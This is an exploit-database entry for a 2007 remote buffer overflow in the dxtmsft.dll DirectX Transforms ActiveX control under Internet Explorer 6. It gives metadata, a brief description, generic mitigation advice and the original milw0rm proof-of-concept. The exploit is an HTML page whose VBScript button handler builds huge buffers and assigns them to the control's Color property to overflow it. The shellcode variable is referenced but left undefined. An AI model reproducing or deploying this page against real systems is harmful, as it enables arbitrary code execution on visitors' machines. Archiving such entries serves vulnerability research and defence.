dxtmsft.dll Remote Buffer Overflow Exploit

vendor:

dxtmsft.dll

by:

DeltahackingSecurityTEAM

7.5

CVSS

HIGH

Remote Buffer Overflow

119

CWE

Product Name: dxtmsft.dll

Affected Version From: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

Affected Version To: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

Patch Exists: NO

Related CWE:

CPE: Microsoft® Windows® Operating System

Metasploit:

Other Scripts:

Platforms Tested: Windows

2007

dxtmsft.dll Remote Buffer Overflow Exploit

This exploit targets a vulnerability in dxtmsft.dll, which is a part of DirectX Media -- Image DirectX Transforms. The vulnerability allows for a remote buffer overflow attack. By clicking a button on a webpage, an attacker can execute arbitrary code on the target system. The exploit code in this case creates a large buffer, overflows it, and then injects shellcode to be executed.

Mitigation:

To mitigate this vulnerability, it is recommended to update the affected software to a patched version or apply any available security updates from the vendor. Additionally, it is advised to exercise caution when visiting untrusted websites and avoid clicking on unknown or suspicious links.

Source

Exploit-DB raw data:

<!--============================================================================
dxtmsft.dll Remote Buffer Overflow Exploit
Internet Explorer ver 6.0
DeltahackingSecurityTEAM
Bug discovered by Dr.Pantagon
Affected Software: dxtmsft.dll  (DirectX Media -- Image DirectX Transforms)
DLL VER : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Company Dll : Microsoft® Windows® Operating System
path : C:\WINDOWS\system32\dxtmsft.dll
all software that use this ocx are vulnerable to this exploits.
www.Deltahacking.net
www.Deltasecurity.ir
==============================================================================-->

<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>

<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
 Sub jojo
  buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA")

  get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee"

  buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")

  egg = buff + get_EDX + buff1 + scode

  Chroma.Color = egg
 End Sub
</script>

# milw0rm.com [2007-07-31]